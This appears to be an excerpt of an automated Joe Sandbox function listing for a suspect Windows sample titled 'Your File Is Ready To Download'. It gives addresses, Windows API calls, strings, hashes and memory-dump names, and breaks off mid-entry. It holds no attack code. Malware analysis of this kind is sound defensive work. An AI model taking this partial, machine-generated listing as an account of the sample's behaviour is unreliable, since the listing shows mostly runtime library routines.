Opcode ID: a4f59ac87be66cdac9b1ccc389bdead8c9e68ff9f944a8621786228ad0dbf133
Instruction ID: 7fc5b71f0cb69264bc5ca248ec7cdbd893a6823ec1c1e07e86a03c6b67555fcc
Opcode Fuzzy Hash: a4f59ac87be66cdac9b1ccc389bdead8c9e68ff9f944a8621786228ad0dbf133
Instruction Fuzzy Hash: F221F23160078082F3629B27B944BADA291B78CBE4F204B20FF5983BE4EF38C4428710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B1020, Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00000001400B1045
GetTickCount.KERNEL32 ref: 00000001400B1056
IsWindow.USER32 ref: 00000001400B1070
GetTickCount.KERNEL32 ref: 00000001400B1080
IsWindow.USER32 ref: 00000001400B10A1

Part of subcall function 0000000140081150: SendMessageTimeoutW.USER32 ref: 000000014008117D
Part of subcall function 0000000140081150: GetWindowThreadProcessId.USER32 ref: 0000000140081194
Part of subcall function 0000000140081150: OpenProcess.KERNEL32 ref: 00000001400811AB
Part of subcall function 0000000140081150: TerminateProcess.KERNEL32 ref: 00000001400811BE
Part of subcall function 0000000140081150: CloseHandle.KERNEL32 ref: 00000001400811C7

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ProcessWindow$CountMessageTick$CloseHandleOpenPostSendTerminateThreadTimeout
String ID:
API String ID: 1366898224-0
Opcode ID: 460b27a332e21d933ca3d1d8fcb56fdead7a4a90c52796f97ca23ca4001451f9
Instruction ID: 9a3fbae626195b665d6fbbda2c64832f1b660cdd77e230333fc93a859af33721
Opcode Fuzzy Hash: 460b27a332e21d933ca3d1d8fcb56fdead7a4a90c52796f97ca23ca4001451f9
Instruction Fuzzy Hash: 2911A032724A8082FB566F63B4543EE12B0ABCCBC4F481034BB17077A9DE78C8828640

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CD0C4, Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD0CE
FlsGetValue.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD0DC
SetLastError.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD134

Part of subcall function 00000001400CF2B4: Sleep.KERNEL32(?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CF2F9

FlsSetValue.KERNEL32(?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CD108

Part of subcall function 00000001400CD00C: _lock.LIBCMT ref: 00000001400CD060
Part of subcall function 00000001400CD00C: _lock.LIBCMT ref: 00000001400CD07F

GetCurrentThreadId.KERNEL32 ref: 00000001400CD11C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThread
String ID:
API String ID: 2194181773-0
Opcode ID: ab2ca03aca749694637dba0d4c81b756c42c5197dec300c3b9876d02556c3a1e
Instruction ID: 370f77ef9231c3825b5d90093b6aeef87ff55cb95a05fd2b6783cb5157d9e728
Opcode Fuzzy Hash: ab2ca03aca749694637dba0d4c81b756c42c5197dec300c3b9876d02556c3a1e
Instruction Fuzzy Hash: 6201483520574182FB5ABF67A4453ED3251AF8CBE0F184629FF66433F5EE38D4469610

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004F130, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400673E0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
Part of subcall function 00000001400673E0: IsWindowVisible.USER32 ref: 0000000140067434

GetClassNameW.USER32 ref: 000000014004F169

Strings

Out of memory., xrefs: 000000014004F467
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014004F21B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ClassForegroundNameVisible
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 3743660214-457448710
Opcode ID: b3cab7a5c7db19a0d270428c9dabe85673806a880ad8fb6730f62affe00b6ec1
Instruction ID: bde0d5ddba9273085413816da81cce9ab286fa124f309a9c3bc649662609a414
Opcode Fuzzy Hash: b3cab7a5c7db19a0d270428c9dabe85673806a880ad8fb6730f62affe00b6ec1
Instruction Fuzzy Hash: 5291F472604B8085FB229F22D5043F96362E79CBD8F554232EB5D177E9DBB8D942E308

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003C0A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 000000014003C2A3

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Out of memory.
API String ID: 0-4087320997
Opcode ID: df67008258fa91a105cce13d756388ead55e87359269fae6e75bbdcc63f90a54
Instruction ID: f8421d74a16c8c3bcebb335d893f5e24c345bf2dc62d06694171e1eecc92832e
Opcode Fuzzy Hash: df67008258fa91a105cce13d756388ead55e87359269fae6e75bbdcc63f90a54
Instruction Fuzzy Hash: A451A176710B8492EA6ADB62E9447DAA3A4F7487C8F848025EF5C437A1EB34D5B6C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140042050, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

<<>>, xrefs: 000000014004212D

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: <<>>
API String ID: 0-913080871
Opcode ID: ef5ebffaa43de46858619d578275ca51a0100b11cd731c15d5d311ae15b86f1b
Instruction ID: 98511740575858d3853fe525514465a87edfddc2e43abeedce7fa0500f83c123
Opcode Fuzzy Hash: ef5ebffaa43de46858619d578275ca51a0100b11cd731c15d5d311ae15b86f1b
Instruction Fuzzy Hash: B741917130474481F76ADB23A5543E963A2E79DBC4F8A5121FF590B6FACB38D896C304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400600D2, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 000000014005FE15
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014005FBB3
Removable, xrefs: 00000001400600DE, 00000001400600FB

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.$Removable
API String ID: 0-2684642848
Opcode ID: cef8b63896b454afe62c83519e9c1e557c4513dec90ec7b155a1fd0f8244688f
Instruction ID: 9483473aa52f797cc1568d812a236129b0e430e88ac5834b9643941199e65e6f
Opcode Fuzzy Hash: cef8b63896b454afe62c83519e9c1e557c4513dec90ec7b155a1fd0f8244688f
Instruction Fuzzy Hash: 8F81283264464181FB67DB27D8243EA5363EB4DBE8F604612AB5E1B7F5CB78C482D340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D4FF8, Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400C8D44: _getptd.LIBCMT ref: 00000001400C8D56

_errno.LIBCMT ref: 00000001400D5036
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D5040
_errno.LIBCMT ref: 00000001400D5064
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D506E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd
String ID:
API String ID: 1297830140-0
Opcode ID: b416a2cb25ee6e6fb95a7f50104bc637c5d7290f9da6e34b7e7da12607badb01
Instruction ID: 432520876f86c4a7d8bc0a4b95c9cb7e74ddb7e1d238a7721a40b54a93184684
Opcode Fuzzy Hash: b416a2cb25ee6e6fb95a7f50104bc637c5d7290f9da6e34b7e7da12607badb01
Instruction Fuzzy Hash: F741F13220878486EB66EF26D5843ED7BA0FB88BD0F544126FF5907BA6DB78C446C750

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A8110, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,000000014003817F), ref: 00000001400A815C

Part of subcall function 00000001400A7FF0: CreateFileW.KERNEL32 ref: 00000001400A803B
Part of subcall function 00000001400A7FF0: WriteFile.KERNEL32 ref: 00000001400A808F
Part of subcall function 00000001400A7FF0: WriteFile.KERNEL32 ref: 00000001400A80B3
Part of subcall function 00000001400A7FF0: CloseHandle.KERNEL32 ref: 00000001400A80C9

WritePrivateProfileStringW.KERNEL32 ref: 00000001400A818F
WritePrivateProfileSectionW.KERNEL32 ref: 00000001400A8209
WritePrivateProfileStringW.KERNEL32 ref: 00000001400A821C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Write$FilePrivateProfile$String$CloseCreateFullHandleNamePathSection
String ID:
API String ID: 1285757948-0
Opcode ID: e67d542d540fcdca2e6148def769da30ffb16f7c3f279e975704602587f8dab9
Instruction ID: 4071b437d11f30958b33739eaf13896785e608d67b90cd8ec59dfd1298f890c1
Opcode Fuzzy Hash: e67d542d540fcdca2e6148def769da30ffb16f7c3f279e975704602587f8dab9
Instruction Fuzzy Hash: 66315E36200AC085DB22DF6698143E92365FB5CBD8F844611FF594BBD9DE78C686C714

Uniqueness

Uniqueness Score: -1.00%

Function 000000014009000E, Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32 ref: 000000014009004F
GetDC.USER32 ref: 0000000140090101
SelectObject.GDI32 ref: 000000014009012E
GetTextMetricsW.GDI32 ref: 0000000140090142

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MetricsObjectSelectText
String ID:
API String ID: 1640997619-0
Opcode ID: 9e3ccf6cb4cf6f09db5a03da322e3185df45fbd831a5f82728f57c21464ab538
Instruction ID: 8eb436b177daa2bdaa5b0b04e2ae376da817d918fa92ad9994032d8206084ab6
Opcode Fuzzy Hash: 9e3ccf6cb4cf6f09db5a03da322e3185df45fbd831a5f82728f57c21464ab538
Instruction Fuzzy Hash: E241B332A007848DE767CB33D4653ED7361EB5E7C8F14C31AEB06676A5EB3894819700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A7FF0, Relevance: 6.1, APIs: 4, Instructions: 79fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400ACB40: GetFileAttributesW.KERNEL32 ref: 00000001400ACBC3

CreateFileW.KERNEL32 ref: 00000001400A803B
WriteFile.KERNEL32 ref: 00000001400A808F
WriteFile.KERNEL32 ref: 00000001400A80B3
CloseHandle.KERNEL32 ref: 00000001400A80C9

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: File$Write$AttributesCloseCreateHandle
String ID:
API String ID: 2152948307-0
Opcode ID: 6ade2452d95ef295d9f60d9a2bf86e90da0746c6e817d976d582cb270ea3e3b0
Instruction ID: cf94bf91ba7b48f58f7222d5318a960be2e55d90912ec46021495256d7cfcc38
Opcode Fuzzy Hash: 6ade2452d95ef295d9f60d9a2bf86e90da0746c6e817d976d582cb270ea3e3b0
Instruction Fuzzy Hash: F621827671468087E7619F26B80079BB294F788BE8F144325BF6547BE4DB38C55ACF04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008FFE8, Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32 ref: 000000014009004F
GetDC.USER32 ref: 0000000140090101
SelectObject.GDI32 ref: 000000014009012E
GetTextMetricsW.GDI32 ref: 0000000140090142

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MetricsObjectSelectText
String ID:
API String ID: 1640997619-0
Opcode ID: 5f4cba9b6fed597a3eb533ef5d6eaff0a4309e8ff7bec479914a67125ed3b2e5
Instruction ID: 9d59315a7fdbaed0768edd02fc5205b36f60ead81233d227081443bf36cfb4a5
Opcode Fuzzy Hash: 5f4cba9b6fed597a3eb533ef5d6eaff0a4309e8ff7bec479914a67125ed3b2e5
Instruction Fuzzy Hash: BE31A032A00B848DE756CB33D4A43E97361EB5E7C8F14C316EB066B6A5EF3994919700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140090066, Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32 ref: 000000014009004F
GetDC.USER32 ref: 0000000140090101
SelectObject.GDI32 ref: 000000014009012E
GetTextMetricsW.GDI32 ref: 0000000140090142

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MetricsObjectSelectText
String ID:
API String ID: 1640997619-0
Opcode ID: 03273376da964b51e7d42eb19259ce87cbe78d48c55577f254b0ec3490d77897
Instruction ID: fc5299265e5b78ddafb04e9f8e03f202696f2675404a126d2caf4639d9dceaee
Opcode Fuzzy Hash: 03273376da964b51e7d42eb19259ce87cbe78d48c55577f254b0ec3490d77897
Instruction Fuzzy Hash: C831A032A00B848DE756CB33D4A43E97361EB5E7C8F14C316EB06AB6B5EF3895919700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CB068, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400C8D44: _getptd.LIBCMT ref: 00000001400C8D56

_errno.LIBCMT ref: 00000001400CAFEB
_invalid_parameter_noinfo.LIBCMT ref: 00000001400CAFF6
iswctype.LIBCMT ref: 00000001400CB01F
_fltin2.LIBCMT ref: 00000001400CB035

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno_fltin2_getptd_invalid_parameter_noinfoiswctype
String ID:
API String ID: 2000152385-0
Opcode ID: bdcc522c411624e7b678b404a804e7733518f85e580d8e9b708400e9def44826
Instruction ID: 9c721a5f4694144b390dc0374c3454c9d595e4ece63fe3d0410a66ffcf75b53d
Opcode Fuzzy Hash: bdcc522c411624e7b678b404a804e7733518f85e580d8e9b708400e9def44826
Instruction Fuzzy Hash: CB11827261878481FB679B26E4513EF7760FB98794F244121FBAD0B6E5EA3CC0858B10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003E040, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000014003E191

Strings

Press [F5] to refresh., xrefs: 000000014003E279
Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after , xrefs: 000000014003E056

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick
String ID: Press [F5] to refresh.$Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after
API String ID: 536389180-3044854981
Opcode ID: 300494998ed9b1cf961e394886dd14a59798e395158655dab6295eeb85754dbf
Instruction ID: c7d175702d3ba08b30b827d6c0d21040ee3bf71bb16f6f68a497b1ebc6ce360a
Opcode Fuzzy Hash: 300494998ed9b1cf961e394886dd14a59798e395158655dab6295eeb85754dbf
Instruction Fuzzy Hash: 0451C172314AC489E7668B3AE8547EB6B91F38D794F548225EF8D43BE9CA3CC445C701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400DC120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001400DC144

Part of subcall function 00000001400CD148: _amsg_exit.LIBCMT ref: 00000001400CD15E

Strings

csm, xrefs: 00000001400DC27B
csm, xrefs: 00000001400DC171

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _amsg_exit_getptd
String ID: csm$csm
API String ID: 4217099735-3733052814
Opcode ID: 08803b1587210fb869c37bb324c154ff8eae623cea55594c0cb4db75334085b2
Instruction ID: e0910fa8c3cbf5b1233f7555ad4f92747ca5953e67d6b3c6a3c93e8655208268
Opcode Fuzzy Hash: 08803b1587210fb869c37bb324c154ff8eae623cea55594c0cb4db75334085b2
Instruction Fuzzy Hash: A051B33212439186EB668F679040BEDB6A0FB4DBC4F448119FF5997BA5CB38C893CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A9050, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400A90DA
WideCharToMultiByte.KERNEL32 ref: 00000001400A9139

Strings

?, xrefs: 00000001400A905E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: ?
API String ID: 626452242-1684325040
Opcode ID: 31df9aeb90ae96771ade722821741ca285b0b954d5aab666edca30c884e0c4eb
Instruction ID: 83e836c990b432d4bbff16ca30f59e73494b58b459d87e099bf6d0250c938243
Opcode Fuzzy Hash: 31df9aeb90ae96771ade722821741ca285b0b954d5aab666edca30c884e0c4eb
Instruction Fuzzy Hash: 3D418032204BC08AEB22DF66E44079A77A4F789BD4F584215FF8E47B65CB38C551C750

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D0A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400673E0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
Part of subcall function 00000001400673E0: IsWindowVisible.USER32 ref: 0000000140067434

wcsncpy.LIBCMT ref: 000000014004D100
_wcstoi64.LIBCMT ref: 000000014004D143

Part of subcall function 00000001400CB068: _errno.LIBCMT ref: 00000001400CAFEB
Part of subcall function 00000001400CB068: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CAFF6

Strings

